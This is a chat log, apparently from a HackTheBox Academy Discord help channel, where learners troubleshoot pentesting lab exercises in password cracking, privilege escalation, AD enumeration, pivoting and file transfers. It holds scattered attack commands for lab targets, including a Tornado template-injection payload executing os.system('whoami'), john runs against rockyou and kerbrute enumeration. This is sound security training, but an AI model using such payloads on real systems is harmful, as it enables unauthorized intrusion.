#modules

Hello i have a question, when im trying to use john to crack the password for zip hash with rockyou wordlist it returns nothing

I'm sure that rockyou wordlist exist in my directory

but when I tried doing the "john zip-hash.txt" and it is working just fine

Might be issue with how you specifying the wordlist?!

how you specifying the wordlist?

Im using this command "john --wordlist=/usr/share/wordlists/rockyou.txt zip-hash.txt"

I cant seem to send a screenshot here idk why

try single quotes instead of double quotes

read and follow #welcome

might be something wrong with formatting of rockyou.txt!

get your roles, and send a screenshot.

maybe rockyou.txt isn't the right wordlist to use? Is this for password attacks module?

how do I get general chat

how do I verify

Scroll down a bit to "Connecting your accounts"
https://help.hackthebox.com/en/articles/5193100-welcome

Here now i'm able to send the screenshot

Idk why but when im cracking some ssh2john password with rockyou it works

yep , your command did not error out , just rockyou.txt did not contain the word needed to match the hash

maybe try one of the wordlists found in the module Resources

So I was trying to make a copy of the root directory like one of the modules suggested as a way to trick the system. That sorta worked? I was able to make it but not write or read. Just that it exists.

You can't write to that file

Maybe ls in that directory to see what you can do

ah , the legendary Getting Started - Privilege Escalation section

I can make new directories

That's what I've been doing.

But does that help you on this scenario?

Holy you're right! The password was not in rockyou but from mutated password list. I'm actually got confused since it returns like 1-2sec it way to fast.

nice work 😉

ls -la the .ssh directory in /root/ and see what seems interesting (hint; permissions) @coarse escarp

Partially because I can write in certain folders.

You don't need to write to anything

Maybe you can read a file you shouldn't

he is still user1

That too

Good catch

He still hasn't gotten to user2

Which is the important bit

The path to root is user1 --> user2 --> root

You saw what you could do with sudo -l as user1

Hot or cold?

Hey, I cannot seem to connect when I try to rdp into the target system via my kali and I cannot figure out why. Please help. 😦 I can connect to the target via psexec tho.

in order to pass the hash with RDP , a certain registry key needs to be set

Hi, yes i have already done that

Hi I am doing Initial Enumeration of the Domain section of "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module. To answer the first question, it requires us to SSH into the target machine. But when I do SSH, it connects but then exits immediately. I have tried adding -o PreferredAuthentications=password but to no avail. What am I doing wrong?

😮 it seems to work now after I updated and upgraded pkgs in my kali. 😄 thank you

which vpn server are you on?

I think I found something useful

gonna come back to this later

guys, any hint about this challenge ? https://academy.hackthebox.com/module/77/section/844

the last one

Start with getting to user2

sudo is the key

done

Check root for hidden directory

||already took the key||

My advice on that wasn't for you

Use the key for root

i think there is an error in my session ?

Did you include the ----START and ----END lines

yup

and there is no new lines in the end

Try using a different text editor to paste into

let me check

EU-Academy-4 Recommended

thank you bro! i should've used the single quote. this really tells me that should be serious about everything during pentest!!!

still got the same error

||chomd 600 done too||

Make sure your system is up-to-date, that's an odd error

5 is also on low rn lol.

I tried 2, and it doesn't work either.

working fine on my end

US EAST pwnbox , US Academy 4 vpn

gonna crash now .

cheers 😉

anyone else not able to spawn targets?

academy went down for a few seconds a moment ago

I logged out, cleared cache and everything, but the target spawning button is just loading.

yep

Anyone... Need help on intro to deserialization attacks Skills assessment 2

@open hollow

hey

Why can't I talk in general?

#welcome

Where can I learn pwn as a beginner

https://academy.hackthebox.com/course/preview/intro-to-assembly-language
https://academy.hackthebox.com/path/preview/intro-to-binary-exploitation
https://pwn.college/

Hi guys,

I’m currently stuck on the broken auth (bypass via parameter modification) level and running out of ideas. I’ve tried to brute-force the user_id parameter using a list of digits. I’ve also tried to brute-force the token parameter in the reset password section, and I’ve tried some tricks with Burp Suite. However, I don’t really know what else I can do or where exactly I should be brute-forcing.

If you guys have any suggestions, I would really appreciate it. Thanks!

the security information foundation path (cant remember the exact name)

If you didnt get this fixed try adding a line break after the end of key line, had this issue the other day and after some googling this was the issue

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: External Recon and Enumeration Principles

Which two new IP addresses are they referring to cuz I see four?

Are the addresses 192.168.186.1 and 192.168.86.1 local addresses? So are the ones they're referring to 178.128.39.165 and 206.189.119.186?

the first 2 are name servers, the other two are resolved IPs

I'm failing to see the difference? Are the first two (192.168.186.1 and 192.168.86.1) ip addresses, not the IP addresses of ns1.inlanefreight.com and n2.inlanefreight.com?

you're resolving the ips of ns1.inlanefreight.com and n2.inlanefreight.com against 192.168.186.1 and 192.168.86.1

Please validate my understanding. So 192.168.186.1 and 192.168.86.1 are two random nameservers that nslookup used to find the A records for ns1.inlanefreight.htb and ns2.inlanefreight.htb?
So ns1.inlanefreight.htb resolves to 178.128.39.165
And ns2.inlanefreight.htb resolves to 206.189.119.186?

yes

I wouldn't say they're random nameservers, they're just ns that your host is querying

Ahh okay, so they're actually the nameservers that my host is configured to query first?

yes

Alrighty, thanks as always!

at the end of metasploit module, does below text ?

refer to this ?

@errant rover

HI i hope evryone is doing good

In the excersie of **SHELLS & PAYLOADS >> Automating Payloads & Delivery with Metasploit **

there is a question
"Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)"

when we try to enumerate it we find

PORT STATE SERVICE VERSION
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Microsoft Windows USA daytime
17/tcp open qotd Windows qotd (English)
19/tcp open chargen
80/tcp open http Microsoft IIS httpd 10.0

for httpd there are total 5600+ exploits in Metasploit for HTTP how to choose the most suitable exploit for it

have you considered enumerating the version of the applications that run on HTTP or other services ?

can you guide me for the filter which should i use to specify the version of HTTP ?

Sorry, I meant #starting-point 😅

oh, I don't have access to this channel

This is the sort of question that indicates some missing knowledge in key IT areas, just my opinion. If you skipped InfoSec fundamentals, it might be better to work on tha first

I think you can check #welcome to get access iirc.

Hey guys so what am i missing on the Nessus skill assessment module? The instance of parrot linux does not have the nessus software on it and i am not able to install it.

the same issue goes for the openVAS module

exact thx

Accessed via browser, Use the target IP and the port number provided

geez thanks. totally missed that

Trying again: Hey y'all I need some help I don't know if I am attacking the question wrong. I am on the a Linux fundamental's course specifically "Filtering Contents" The first question is just stumping me and I can not seem find the correct answer. I have done multiple combinations of the ss & netstat such as netstat | grep -Ev '127.0.0.1|::1' or ss -tuln | grep '0\.0\.0\.0' | grep -v '127\.0\.0\.1' | wc -l and I am just stumped. If someone could help me out I would appreciate it

Can someone tell me: will be prizes for htb academy streak? Or its just for fun

hi ss accepts -4 for ipv4 conections
your tuln is correct u can add 4 like -tuln4
You should grep for LISTEN and pipe to grep invert '127.0' and confirm with wc -l

Thank you for that, I appreciate it

what to do here

If you want a /23 it has to start at 172.16.0.0.

got it

👀

just omit keyword localhost and use -4 for IPV4 as well

there is one more simple way to do that.

Sure share it

I just did that today, use netstat -l.

Sure, let me find..

You will receive batches.

I used this command:
||netstat -tl4 | grep -v "localhost"||

||netstat -ln4 | grep LISTEN | grep -v 127 | wc -l||

can anybody help me out with "Information Gathing - Web" skill assessment question " Perform active infrastructure identification against the host [https]://i.imgur.com. What server name is returned for the host?" I've tried:

• Curling the url and X-Served-By: cache-nyc-kteb1890092-NYC
• nmap -sC -sV and the best result I see is Server: Varnish
• Digging returns i.imgur.com is a CNAME that points to ipv4.imgur.map.fastly.net.

I'm just not sure what they're asking for at this point.

try checking ||the http headers || 😉

Thank you... I was getting it with one of those commands it just didn't seem like an answer. ¯_(ツ)_/¯

kind of an easter egg on imgur's part I guess :^)

yes its definitely unusual

I still can't ping lab boxes and support seems to be out for the day. Can anyone help me please?

Working on the File Uploads Attacks module, Whitelist Filters. More of a Burp Intruder question than the exercise itself. This is an image from the section, with the response at the bottom "Only images are allowed." Some say 'extension not allowed'. If i know certain extensions aren't allowed up front (i.e. PHP) I can just ignore all the extensions with that same length, correct? The others I will just have to manually view the responses, and that's really the only way I can tell which extensions work and which do not?

What?

Hi. I'd like to ask about the Windows Privilege Escalation in the section SeImpersonate and SeAssignPrimaryToken. I wonder why there is a how can I find the COM server listening port in the command flag -l 53375 next to JuicyPotato.exe? Is this from the PID that we'd found from tasklist /svc?

Does it match up, then yes

-l is for the COM server listen port
https://github.com/ohpe/juicy-potato?tab=readme-ov-file#usage

i see. so what are the differences that we use the Netcat port that we usually use (8443)?

The netcat command is a connection command

The point is to make it look like a normal connection to windows

ah got it, i understand now. thanks for the answer @fathom pendant @next bronze

F

I need some help with the File Transfers Module's Windows File Transfers section. This is for the second question. I am trying to get the win_upload.zip file from pwnbox to target VM. I read the section multiple times and even YouTubed an explanation of the section but never look at the answer. The thing is that I keep having trouble doing this no matter which upload method I pick I am having trouble with these PowerShell errors.

Can someone point me in the right direction as to what I'm doing wrong? I even took notes on the section and tried specifying the exact path of the file in PowerShell.

The error says Net-Object is not a command

use New-Object

I came a little closer this way

looks like the ftp requires a username and password, or at least a username

read the error, its in red

'the remote server returned an error: not logged in'

I see how to specify user and password in cmd prompt not powershell

how do I do it in PS?

open chat gpt and paste your script, then say "how do i login anonymously with this one-liner"

ok

you can even just paste the pic in

Are you hosting the ftp server? I would read over the FTP section again, the answers to your questions are in it.

Hello everyone, I am stuck in the Linux privilegde escalation skills assesment module... I am only missing 2 flags but I am running out of ideas

someone has done recently this module:

Seems that there are some credentials for the tomcat adm but I cant find them... I have read that I can obtain a root shell by an exploit to the sudo version but I also cant seem to find the right exploit....

Any help will be very appreciated 🙂

have you tried visiting the tomcat page with your browser?

yes, and says I can edit a file

It also says ||where users are defined ||

but I get access denied when I try to view that file

which user are you trying to view it is?

as barry, seems that there are the credentials of the tomcat admin somewhere

but I have been looking for a long time and have not found them

any other files in that directory that seem interesting?

I have tried all of them and I geta cces denied

are you sure?

in the catalina folders are 2 files that I can see but there are no credentials

you have checked everything besides one file

the docker

Not enough red arrows

i cant install docker since i am not root

you are barry

Take a look at Jared's modified screenshot, it highlights something you overlooked

barry , incidentally, is part of the barry group .

all the files in the directory are owned by root . But then have permissions granted to either the root group, tomcat group , and... barry

I got it with vim

I found the password, I used vim instead of cat

this command you just tried su barry tomcat-users.xml.bak does not make sense

su is used to switch users

I know... Ive been too many hours with this

now I am in the tomcat appliaction

!!!!!!!!!!!!!! nice!!!!

careful with the spoilers

Anyway; seems like it's resolved

spoiler tags are not adequate?

And it seems like @arctic sentinel might need to take a break

well, you are giving out the answer to the exercise

look now you got me in trouble too now

No more screenshots with red arrows for you or anyone else now . I'm gonna have to find a new hobby.

okay i'm done being off topic .

sorry....

no worries bro , it's all in good fun

Today i was facing an issue with ftp attack some VPN servers mostly they located in US has issue with ftp configuration port 2121 was closed yet the correct answer was port 2121 it should be open!

Common service attack module

resetting targets a few times usually gets it to spawn

Yep, i spent some time reseting and changing the VPN locations!

it's a known thing with that lab

Hi everyone!!!
I am stuck on the ATTACKING AUTHENTICATION MECHANISMS Skills Assessment module, need some help.
I've tried changing "accountType" to admin and encoding the token with my key as in Further JWT Attacks Exploiting jwk in the module, but it doesn't work, although the situation looks the same as described in the module. Need a hint 🙂

Completely stuck on the skills assessment for intro to assembly language. I've figured out a bit for the first question but I'm stuck at a wall; the second question I'm completely stuck on. Can anyone help or DM for confirmation?

#modules message
for the second question, the hint is pretty useful

@fathom pendant which inveigh release should i download im in AD Enumeration & Attacks - Skills Assessment Part II and trying to Crack this user's password hash and submit the cleartext password as your answer. https://github.com/Kevin-Robertson/Inveigh/releases

i think i downloaded Inveigh-net7.0-win-x64-nativeaot-v2.0.10.zip and used inveigh.exe but it never captured the CT***'s hash

I'm having trouble gaining escalation priv. as I'm lost to where I should look in the /bin folder.

I'm trying to get to use2

I know I'm supposed to be looking for a file that has creds for user2 but I'd like a bit of a hint.

maybe a letter or number or something.

Any tips on the first question? I've ||created a looping function and set a breakpoint at the end of the loop, then looked at the last 24 hex bytes of $rsp|| but I don't know what to do after that.

read what I've linked

where you run it also matters

i ran it uh on 172.16.7.60 with administrator's hash i was on Sq01 host

there's another host you should have admin on

i tried with ms01 but error

have you done the previous questions?

yes i only know sq01 host and ms01

ohh

wait im trolling

Sorry I didn't see the link to the previous post, clarifying question for the shellcode we combine them as is or do we have to reverse them?

just combine as is

Good afternoon everyone!
Is there a channel for Htb Machines! I have a question regarding the new seasonal machine that came online today. Thank you!

i just downloaded the precompiled one from one of the AD targets

ok

i used Inveigh-net7.0-win-x64-nativeaot-v2.0.10.zip from inveigh and it looks like it worked i was able to get CT** hash

hi i'm on the password attacks module. Stuck on the question in the Attacking AD & NTDS.dit module that asks to submit a the password for John Marston

So, dump thr NTDS.dit file

There's a whole set of methods

Also think of common username methodologies

I have tried generating a wordlist using cewl based on the website and used that with generated userlist from username_anarchy

i also used a list that I created manually using commoon username conventions

first.last flast firstlast etc.

Try using a fast wordlist for passwords

thank u

There's one shown in the section

one what?

Wordlist

ah yes. I also have one in my wordlists folder on my box

sigh

or i can try the one in the resources

Use the wordlist shown in the section for password attacking this section

thanks

I thought I had done that alrady I'm probably getting confused tharshing around. Gonna try my username list with teh supplied password list in the resources

it's not gonna have it

maybe the mutated list may have it, which is reused a fair bit

but look at the examples where they plug in a password list

use that

🙂

thanks i think I had u right the first time

a fast one

this is where i misunderstood.... i read "shown i the section" as "provided in the resources"

if it was in the resources i would have said use mutated list

yep it's my bad

i'm on the right track now i think though thanks to your hints

i feel thick sometimes

take a minute to read and your life is better

yes indeed

also i need to have an idea of what I have already done

hello everyone

Hey everyone The pivoting tunneling and port forwarding module anyone have issues with the socksoverRDP trying to copy to target flagged as virus will not copy?? anyone else had this issue and fiind resolve?

I have a issue with the Skills Assessmet i the module Windows Attacks & Defense

I'm not able to get any event log with the ID 4886 or 4887

of course I ran successfully the attack

disable real-time protection

are you checking on the PKI?

killa will try that now thank you

If you're still looking for this: On webadmin, forward SSH local port 3389 to 3389 on the 5.35 pivot machine; then SSH into the 5.35 machine and set up netsh interface portforward of 3389 from 5.35 to 6.25 port 3389. Now you can RDP from your attack box to the 6.25 machine.

I thik I'm confused. I tried to check event viewver inside DC2 machine

hey got passthat and loaded the dll but the exe says plugin wasnt loaded pritty buggy this one

Hello, hello, someone has already done the Broken Authentication Skills Assessment, I'm a little stuck

steps simplified

1. load dll
2. rdp to second machine
3. set the exe on second machine
4. on first machine set up proxifier
5. rdp from first machine to 3rd machine

ok rdp to 2nd is that from the 1st machine cause the remote desktop need the proxy to work doesnt it?

yes

by machine number i'm referring to the initial target; #1
the middle machine mentioned in the section; #2
and the final machine mentioned by the question; #3

also you don't need the proxy for the second machine

just rdp to it from the first machine; you have direct access to it; read the text carefully for the ip and creds

use different dictionaries, don't just depend on one rockyou

solo ingles

have you completed the PKI - ESC 1 section? I recommend going back and reviewing it carefully. Specifically, what it says regarding Events 4886 and 4887 😉

Damm cannot get to third

networkwont work

well you need to go from 1 --> 2 and set up the relevant tools

then once everything is set up you should be able to go 1 --> 3

ah , are you discussing the SocksOverRDP section?

can i close 2 once setup to reduce network stress

yes I did it without difficulty. I cannot conect to PKI with RDP

thats intended

I guess I cannot check the log thourgh Evet Viewver but directely with the commad lie

yep :)

Get-WinEvent

Can you recall how you were able to connect to PKI before? In the PKI - ESC1 section?

read the section, it tells you how to adjust for that situation 😉

but i believe so; as closing rdp doesn't log out of the session, technically. as you can re-rdp in and pick back up

Hey, on academy I'm trying to start a module, by clicking unlock, but nothing happens. Does anyone know why this might be?

For extra context, I have recently unlocked a differnt module and I have enough points to unlock it

I cannot connect through winRM to the PKI machine

maybe test it on a different browser

why not? Is it giving you any errors?

odd why did it work on safari but not brave

ty anyway

brave might have javascript blocked or something

or some type of pop up blocker

probably

brave has native popup/adblockers that you'd have to do some whitelisting to get HTB to work right

👍

Hello

Any hints for Whitebox pentesting type juggling?

I am literally banging my head against the wall

Whitebox Attacks - Authentication Bypass?

Hello guys !!

I'm Intrusionz3r0

I have a doubt about port forwarding 🙂

Yes

Which one?

anyone here able to help get information on a pred?

This isn't the server for that read #rules and reach out to police

okay thank you,hes said some vile stuff so tryna get information on him before I called the police.

I cannot perform the portforwarding because when I executed the next comand: ssh -L 1234:localhost:3306 ubuntu@10.129.224.78

Then I execute: netstat -natp | grep 1234
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
ubuntu@WEB01:~$

I don't know why the port forwarding don't work properly 😦

What am I doing wrogn?

Anyone here good with Linux?

I need to ask some questions for an application I am making

It is not local host. It is the target Server's IP

Not working yet 😦

if you suspect illegal activity call them (police). This server isn't a hacker for hire/rent server

The server on the other side of the tunnel.

Not the pivot box

Any hints?

Let]

Let's try 🙂

The target has the port 3306 open locally so I want to access this port using my attacker machine by using portforwarding over SSH

So I cannot do it 😦

I cannot see it externaly so the only way is using a portforwarding

I want to use the SSH way

are you doing the port-forwarding/pivoting module/have you done that module

I’m trying to transfer a file using the “Bash” method, but nothing is happening. I’m not seeing any files after entering these commands.
Any insight?

Yes I'm doing this but I cannot yet

Show the a screenshoot bro !

what section are you on?

i don't see where 3306 is open, I see where 3389 would be open

since it's stating RDP

also it's much easier to just do ssh -D instead

Well, actually, I’m getting a connection refused error.

because you're misunderstanding what you're meant to do

also yeah; that IP won't work because it's just an example

adapt to your situation

I’m all ears.👂🏽
And that’s my actual tun0 ip

connection refused it could be that you need to use sudo

considering port 80 is < 1024

any port < 1024 requires sudo to open

Sudo didn’t work…

also; first statement "Connect to target webserver"

meaning you have to connect to the target/victim that's listening

I’m currently ssh into target.

do you have a web server running on port 80?

:))

I was able to use a python server and transfer the files, no prop.

if not; adapt to whatever port your webserver is running on

:))

connection refused == port not open or firewall prevented

No? 🤔
Im confused.
Ok, so still start the python server on my host?

yes

if you notice: the example is stating using a web server

and port 80 is default http

but if you're not default; you'll need to adapt

imo this scenario is something you'll rarely ever encounter

See it ends with 50 not 78

that's actually not applicable in this scenario

that's just a visual aid

So, where is my file?

brother look at the third step

cat <&3

🙂
Got it.
Not sure why this confused me.

in this scenario for the question, I don't believe SQL is actually running, and this is just an example to help clarify

You didn't open a server. It says connection refused

we're past that

look further down the screenshot

:)

I got it goin.

also i suggest taking actual screenshots instead of half-quality phone camera shots

makes it much easier to actually read (as long as you're not grabbing a 4k screen)

you're using a vm yeah?

Lol

depending on your vm there's a host escape key and windows has the win+shift+s which is the screen snip tool

Well, I use discord on my iPad, and I’m working on my laptop.
I didn’t want to do a bunch of extra stuff.

well; it'll lead to better quality and easier parsing for others

I’ll figure out a better workflow.

or at the very least, learn how to aim at your laptop straight

instead of at a weird angle

💀😂

What the is output of your server?

🙄
Thank you Marcie…

I solved it. I am confused still lol.

Not sure what you mean.

they figured it out

it was a simple issue between keyboard and chair

Question 🙋🏽‍♂️
So, in the modules, we only have access to the target because we were given a vpn key.
How are they gaining access in a real attack?

usually via explicit permission from the company

Hey guys I understood the concept thank you so much for you amazing support !!

either through an external web server; or through a direct connection

it just depends on the scope and the contract ¯_(ツ)_/¯

some want a full out to in; some only want to see what the damage could look like if it was just some internal threat actor

the CPTS exam is from the perspective of full Outside to In

Right. I guess I’m thinking of full outside to in.
No access given at all.

Break through DMZ (The device that would share an Interface with the VPN) to internal (Devices that share an internal network interface with the device)

usually via an exposed web-server

Ok… I see.

Web servers are by far the most common vector for threat actors to break in

it's why a portion of the course goes over surface level web vulns ¯_(ツ)_/¯

Makes sense.
Still putting the whole big picture together in my head.

Hi

don't try putting the picture together without all the pieces

just know that pivoting is a small piece of the puzzle

hence why it's important to learn

otherwise you'd be going from box to box from an internal host, and constantly transferring binaries/files

leaving a huge trace/mess to clean

What? :"D

I mean, just the general concept and where common attack surfaces are.

it's simple; how do most businesses reach customers -- via the web

a lot of the common services that get attacked are also backend services for web services

Right.

such as an SQL/Database backend

or file hosting server for downloads (FTP)

It’s basically attacking a web app and getting a shell, then pivoting and escalating.

yep

though in most cases you'd drop some form of persistence rather than a simple reverse shell; (but that goes beyond the scope of CPTS)

Thanks for teaching us marcie

I just read a lot

But it really just depends

that's the whole crux of it;

you're not normally gonna find an exposed server that has EVERY service on it

But what about attacking someone’s personal computer?
There is no web server or app.

that's via social engineering

Right…

often a malicious file download that links their computer to your C2 server

I see.

because having them directly connect to your machine is a one way ticket to getting caught fairly quickly

but again attacking individuals is NOT part of HTB curriculum at all

and I doubt it will be

considering the legal implications that could come of it

They don’t cover social engineering?

no

pegasus malware 🤢

Social engineering isn't really something that is easily taught

you need an actual test dummy to throw your attempts at

Oh ok.
I feel like that’s in the OSCP

it's not

Hm

the OSCP and CPTS cover similar domains

and Social Engineering dives more into Red Team than it does Penetration Testing

(it's not mutually exclusive, but you'll see Social Engineering attempts more in a Red Team operation)

They’ve got client side attack module there is a script simulating a user clicking email attachment

there's some phishing

but it's not to the extent where they teach you how to set up a tool like GoPhish or other popular phishing tool

I thought pen testing was emulating red team attacks. Basically.

nope

completely different scopes

Hm

Red Team are still on the side of security btw

Red/Blue team are two sides of the same coin

Red Teams are meant to emulate a more sophisticated threat actor

From my understanding pentest focus is picking out vulns and usually there’s a strict scope while red team literally behave like real world threats and test the ability of your blue team and entire defense system?

AV Evasion, C2 servers, etc.

Right.
But blue is more soc analysts.

basically PenTesting isn't a matter of getting caught -- it's a matter of finding weaknesses and often it doesn't matter
Red Teaming however takes it to another level; you don't want to get caught, period

Yeah like simulating APTs

I hear you.

to summarize someone that actually does red teaming: "pen-tests are meant to be comprehensive assessments and red team assessments are meant to represent a realistic threat actor"

but you could have a pen-test where they want you to be as quiet as possible, and red team engagements where they want you to make as much noise as possible

They would seem similar, but have some differences in scope.

Hey got it marcielee thanks for that yeah internet was nightmare with it was done right just kept disconnecting even with the modem 56k

setting

switch to the tcp vpn

I'm creating notes for the different kind of "remote password attacks" that are possible, and I have trouble finding a specific term. Currently I have:

- **Brute Force = user list + pass list**
- **Password Spraying = user list + 1 pass**
- **? = 1 user + pass list**
- **Credential Stuffing = list of user:pass combinations**

So how do you call trying to find the password for a specific user with a list of passwords?

like hydra -l username -P pass.list or kerbrute bruteuser

there's no specific term that i know of . I would just call it "Bruteforcing a user's password."

I'm sure CompTIA is a bit more pedantic

actually, "bruteforcing" itself is somewhat of a colloquialism . A literal bruteforce is to test every single possible character combination until the right one is found. But in everday vernacular, bruteforcing is just the overarching term for the types of attacks you are describing.

👋

Well, I am stuck at the skills assessment for Whitebox PenetrationTesting. I got Larry. Any advice? Or am I following a rabbit hole?

@west canopy Alright, thanks the answer. After searching on internet then asking 2 LLM and getting different answers every time that's also what I was going for, but I wondered if there was a specific, not widely used word for it.

np 😉 just as an example from our Password Attacks module

we just say "bruteforce the password of the user sam"

There's one instance of using a password spray; but that's in the AD enum and attacks module, in context you already have a foothold user and are doing further enumeration

Good morning Good afternoon to all. I hope you are having an excellent Sunday. I have a question regarding the SSRF template injection example 2. During the exercise the author indicate to inject a Tornado payload to get the whoami on the system as such:

curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

When I perform the same I get the same result as in the example but I dont see where is the whoami info.

<h3 style="text-align: center;"><em>Email 0 has been subscribed. You'll hear from us soon!</em></h3> --> This should be here but is not very clear what is the current account.

The same things happen when i try to get the ls content of the directory or cat something. No clear result. Any input is welcome. Thank you loads

is it You&#39?

no

' is html for ' or the apostrophe

"you'll hear from us soon!"

I have the same problem. Has anyone completed the 2nd question on KLEE in the binary fuzzing module? KLEE produces only one error " memory error: null page access" for me. But there should be two errors...

is very strange because in the exercise i dont see where the whoami comes up. In that picture no whoami account is visible i think.

try injecting another command and see how it differs

yes .... i did this with multiple commands and checked also if the excericise server is ON also. I was getting in burp the same answer for all commands. The same when injecting commands with curl

have you tried using single quotes instead of double quotes?

good thought 🙂 but i am getting 500 internal error

ok then im not sure :/ I haven't done this module so idk

no stress 🙂 thank you for your input cydroz

can i dm someone about aen

For Intro To Assembly Skill Assessment I believe that I have optimized the code correctly but I'm still not getting the flag. Can anybody double check to see if I'm missing something?

check if the shellcode is under the limit, if it isn't, optimise some more

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Initial Enumeration of the Domain

When they list the types of setups a client may choose for testing, this is one of them:

VPN access into their internal network (a bit limiting because we will not be able to perform certain attacks such as LLMNR/NBT-NS Poisoning).
Can someone explain to me why we wouldn't be able to perform LLMNR/NBT-NS Poisoning?

Can't responder be started and the attack carried out from a machine that we compromise?

Yes but after having a foothold, and it's especially interesting to get a foothold (my understanding)

I don't think I have the skill or vision to optimize it more than I already have, going from the hint I removed the last part but from what I'm seeing the final byte size is still too high, if we're supposed to make it an elf64 executable afterwards.

Wdym by "it's especially interesting to get a foothold"?

use the hint and the Shellcoding Techniques section

It's a great attack vector to get a first domain user, to "set a foot" in the AD*

just use the hint

you just send the shellcode btw, you don't have to compile

or rather just extract the shellcode because the compiled binary will be a lot bigger

the IPs you get through a vpn is usually in another subnet and the traffic will route through the VPN gateway to reach the internal network, so there wouldn't be any LLMNR/NBT-NS to poison. once you have compromised a host of course then you can run your posioners there locally

Understood, thanks.

Just so I'm understanding this right. When you connect via a VPN, you'll get access to a separate subnet, this subnet will then communicate with resources on the internal network through a "VPN gateway" that separates the VPN subnet from the internal network. So like this:
Me at home → (Over VPN) → VPN subnet (at company) → VPN gateway → Internal resources

And since there are no resources on the VPN subnet, I can't perform LLMNR/NBT-NS poisoning? Isn't it possible for other people (targets) to be connected to the VPN subnet on whom I can perform the attack when they try to access an internal resource?

that is generally the case but it depends heavily on their configuration, but yes usually its isolated

Also, am I understanding the following statement correctly? I've drawn a diagram based on it.

A custom pentest VM within their internal network that calls back to our jump host, and we can SSH into it to perform testing.

there usually isn't much traffic inside the vpn subnets and again depends on how it's configured, you might not even be able to reach the other vpn hosts

Understood, so it all depends on the configuration. Thanks!

something like that, usually it's you connect to the vpn provided, then rdp/ssh into their internal host for your pentests

Got it, thanks.

@limber river @next bronze I can proudly tell you I'm an idiot that thinks to much and made this much harder than needed. With that being said I figured it out. Thank you.

hey guys!!
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
How should I connect?
I used python3 mssqlclient.py backdoor:Password1@<ip> , but still cant connect to it

what should I do need help

wat authentication does it use ? does it tell u

no

whats the error

i used msfconsole
and it says login failed unable to connect

what's the error from mssqlclient? and what's the module and section

I cannot get anything
select name from sys.database is not running

This might be related #modules message

can someone help me with the file upload attacks type filter?

hey, i know i already see this background on an app but don’t remember the name, it can make topology and other stuff

draw.io

thanks

Hi all, I am on the Kerbal Exploit module. Copied the Registry Hives, also priv. esc. to Admin. Upon opening the PS shell as admin and accessing the directory C:\Windows\temp none of the copies hives are there. I have also manually copied it, still nothing shows, any ideas? Thanks in advance!

Is there a way to make the yellow banner at the top of the page for all modules go away?

I tried using ublock origin but it just broke the page more

I'm in the AD enum and attacks module right now and I had a thought about Nmap I wanted to check with ya'll.
Is there a difference between the two scans below?

# Scan 1
sudo nmap -sV -sC -Pn -n -iL hosts.list

# Scan 2
sudo nmap -sV -sC -A -Pn -n -iL hosts.list

I know that -A performs some more stuff like OS detection and whatnot but I've had instances where sometimes performing scan 2 will leave out information I found in scan 1. Any of ya'll face similar issues?

Just to be clear, I did not face this issue in the module I'm currently doing.

Ya'll can ignore the -iL hosts.list since when I faced this issue, it was against a single IP address/host.

more flags just check more things, you shouldn't get less information in return

I think it happened to me on one of the machines on the main platform, Crafty iirc. But good to know that information shouldn't be less. So it's always better to have -A in there?

can someone help with this

depends on how you want to scan it, -A checks more things but your scans will also take longer

just ask bud

on the tomcat host in the internal network (MS01), is the login supposed to be bruteforcable, because i my attempts seem to keep timing out

timing out or failed to find the right creds

it times out before it reaches the last set of creds

it shouldn't timeout, you need a stable connection to interact with other hosts too

Can someone help me in this question from DNS Enumeration using Python
Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.
I have saw all the records using dig and nslookup but no record stands out except SPF.
Update: Solved

Does it perform active vulnerability checks?

It doesn't, right? At least I didn't see anything in the documentation about it doing so.

no

I mean, don't use namp for vuln scans

Linux privilege escalation - Environment enumeration, trying to submit the flag but says its wrong, can anyone help out?

You sure there is no trailing space?

yup made sure to copy the flag only, no spaces

did you get the right flag

In this module, there's the following command, but when I run it, it doesn't write the usernames it found to the file. It just outputs in the terminal and the file is empty. What's wrong with the command?

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users

Hi

yeah... it's dumb

submit to #1234357888114364508

Anyone know's how the format of the question Review the PATH of the htb-student user. What non-default directory is part of the user's PATH? Module: Linux Privilege Escalation, is the full path? I'm having a very hard time here

Should I just redirect output?
command > file.txt

it likely won't have the desired output

yeah theres only 1

as > redirects all the stdout, where the output command could do something additional

Yeah, it won't. And what's surprising is that the help page for kerbrute shows that the correct option is used. So do I still need to submit to #1234357888114364508?

yes

Ok

as the tool isn't working as intended

What do ya'll CPTS people do in this case?

use a different tool

kerbrute is just an old and buggy tool tbh

but there's not really a replacement for it

can't you do it with nxc/cme?

Oh, what's recommended in its stead?

Welp

doesn't do kerberos, it's much faster

it be like that

Ya'll do some kinda grep on the output to get the usernames then?

I use tmux so it's easier to me to manage outputs and search through them afterwards, idk what other peope would do tho

what's the first and last letter inside {}

Search through them? I'm using kerbrute to enum users so I wanna get a list. I use tmux too, but I don't think there's a way to extract the usernames using it, right? I'll have to do some sort of text redirection and formatting, yeah?

S...d

Also, what ya'll do for CPTS exam and pentests then? How do ya'll report the output? Copy-paste?

yeah not the right flag

copy mode and just copy

I have a script that will copy the output from the last command

but yeah redirection should work in this case

That's neat.

I like to copy and paste into code blocks, personally I feel they're better, but some of my colleagues use screenshots, doesn't really matter

What's the recommended method for CPTS reporting?

Or just in general?

Also, what tool do you use for reporting that lets you copy-paste to code blocks?

there's templates publicly available if you check #cpts

there's also the Documentation and Reporting module

Noted. Thanks Marice.

Haven't reached there yet but good to know it's covered.

I did read a bit of it briefly once a long time back.

Documentation and Reporting pulls together practically everything you did up until that point in the path

then Attacking Enterprise Networks is the Mock Exam

doing that blind (don't read the questions or text) is a good sign you'll be in the right mindset for the exam

Does documentation and reporting contain another pentest to walkthrough and document?

Do it blind the first time or second time?

first

it's not blind if you already saw it once

True

I'll have to organize my mess of notes before that module then.

it has a report for that module that's referenced

That module?

